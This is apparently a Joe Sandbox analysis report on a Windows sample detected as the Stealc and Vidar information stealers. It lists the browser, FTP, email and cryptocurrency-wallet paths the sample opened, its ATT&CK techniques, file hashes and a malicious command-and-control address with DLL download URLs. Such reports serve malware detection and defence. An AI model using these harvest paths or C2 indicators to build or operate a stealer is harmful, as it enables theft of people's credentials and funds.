Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7596, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1764315885.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7596, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7596, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	50%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1836331325.000000001D57C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll$	file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpl	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dllXD	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll.D	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	DBKKKEHDHCBFIEBFBGID.0.dr	false		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dlltD	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllxE	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2014749931.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2005739607.000000001D671000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phph	file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpM	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllJD	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2015257049.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpP	file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false		unknown
http://185.215.113.37/#	file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpT	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dlljE	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37OQIG	file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000003.1836331325.000000001D57C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t	file.exe, 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpBFt	file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, DBKKKEHDHCBFIEBFBGID.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpenSSH	file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpnomi	file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php8	file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	JKEBFBFIEHIDAAAAFHCFCGIECB.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, AECAKJJE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php#	file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524369
Start date and time:	2024-10-02 18:18:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 76 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	66fb252fe232b_Patksl.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AECAKJJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AECAKJJECAEGCBGDHDHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
